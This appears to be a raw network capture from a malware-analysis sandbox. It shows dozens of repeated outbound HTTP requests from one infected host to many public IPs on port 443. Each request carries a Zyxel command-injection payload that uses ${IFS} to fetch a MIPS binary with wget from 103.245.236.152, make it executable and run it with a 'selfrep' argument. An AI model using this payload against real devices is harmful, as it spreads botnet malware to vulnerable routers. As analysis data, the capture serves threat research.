                                      Jan 14, 2024 15:50:59.599517107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7651192.168.2.1435308182.47.95.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599549055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7652192.168.2.1454332182.149.252.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599591970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7653192.168.2.144514451.143.117.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599613905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7654192.168.2.1449276197.9.202.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599667072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7655192.168.2.1458138142.8.196.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599695921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7656192.168.2.145299296.226.9.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599761963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7657192.168.2.1439958117.226.137.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599783897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7658192.168.2.1437984109.86.201.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599829912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7659192.168.2.1454100158.116.186.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599872112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7660192.168.2.1446198220.188.153.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599917889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7661192.168.2.1452426141.169.190.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599957943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7662192.168.2.1450442151.195.42.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.599978924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7663192.168.2.145449861.218.182.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600019932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7664192.168.2.1434116201.192.71.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600047112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7665192.168.2.144274877.207.33.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600087881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7666192.168.2.145703232.233.101.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600121975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7667192.168.2.1440500168.164.52.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600172997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7668192.168.2.145903291.138.201.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600219011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7669192.168.2.1458216213.95.137.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600267887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7670192.168.2.145121278.22.200.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600297928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7671192.168.2.144577232.176.119.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600337982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7672192.168.2.1437440109.141.122.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600377083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7673192.168.2.144483225.11.159.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600419044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7674192.168.2.145703425.40.166.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600471973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7675192.168.2.1446146156.40.56.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600524902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7676192.168.2.1452576103.164.69.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600548029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7677192.168.2.1438656171.176.29.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600608110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7678192.168.2.1458366208.146.45.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600719929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7679192.168.2.145520259.0.168.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600774050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7680192.168.2.1443092124.62.150.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600800991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7681192.168.2.1459838197.65.244.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600840092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7682192.168.2.1444084197.232.109.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600883007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7683192.168.2.1455678118.97.252.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600933075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7684192.168.2.145761066.252.47.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600970984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7685192.168.2.1456632107.46.225.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.600996971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7686192.168.2.1459046142.160.245.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601046085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7687192.168.2.143780651.160.127.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601113081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7688192.168.2.145993260.124.80.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601145029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7689192.168.2.143617497.140.98.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601186991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7690192.168.2.145215665.179.185.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601237059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7691192.168.2.1438360209.100.32.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601284981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7692192.168.2.143889431.1.252.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601311922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7693192.168.2.1450550155.125.194.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601355076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7694192.168.2.145628050.22.163.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601388931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7695192.168.2.1444582180.237.184.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601432085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7696192.168.2.1440586143.91.10.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601449966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7697192.168.2.145866217.152.57.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601480961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7698192.168.2.144271274.142.167.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601515055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7699192.168.2.1451030134.82.82.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601546049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7700192.168.2.144435850.101.52.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601587057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7701192.168.2.143927292.239.166.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601654053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7702192.168.2.144650438.34.155.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601675987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7703192.168.2.145513471.30.182.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601712942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7704192.168.2.1444400132.159.242.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601749897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7705192.168.2.1440124134.154.53.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601789951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7706192.168.2.144867889.149.34.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601814032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7707192.168.2.1458750204.108.241.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601866007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7708192.168.2.1438418121.245.20.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601897955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7709192.168.2.143513690.1.214.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601932049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7710192.168.2.1441932108.201.190.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.601982117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7711192.168.2.143607443.29.76.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602008104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7712192.168.2.1450770188.6.225.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.602078915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7713192.168.2.1443820149.61.139.100443
                                      TimestampBytes transferredDirectionData
